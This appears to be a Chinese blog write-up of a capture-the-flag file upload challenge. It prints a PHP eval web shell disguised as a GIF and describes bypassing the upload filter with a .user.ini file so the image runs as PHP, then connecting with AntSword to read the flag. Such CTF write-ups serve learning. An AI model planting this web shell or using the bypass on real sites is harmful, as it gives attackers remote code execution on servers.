看到字符upload 就想到了文件上传漏洞
就先上传一个一句话木马试试
似乎直接上传不成功,可能是有什么过滤
再上传一个包含一句话木马的图片试试
发现提示不能是图片,这时候就不会了,在网上找了一下wp
发现需要修改一下木马的内容
GIF89a
<script language='php'>@eval($_POST['a']);</script>
成功上传木马图片,并且能知道上传的地方,但是图片能连接,但内容为空
看到大佬利用了.user.ini
这个后缀使之构成php后门
也就照这大佬的思路进行复现
使用蚁剑连接cat /flag
即可
总结
这道题主要是还是利用了文件上传漏洞,利用.user.ini文件构造php后门,使之前上传的木马图片可以被执行。
原创文章,作者:奋斗,如若转载,请注明出处:https://blog.ytso.com/273164.html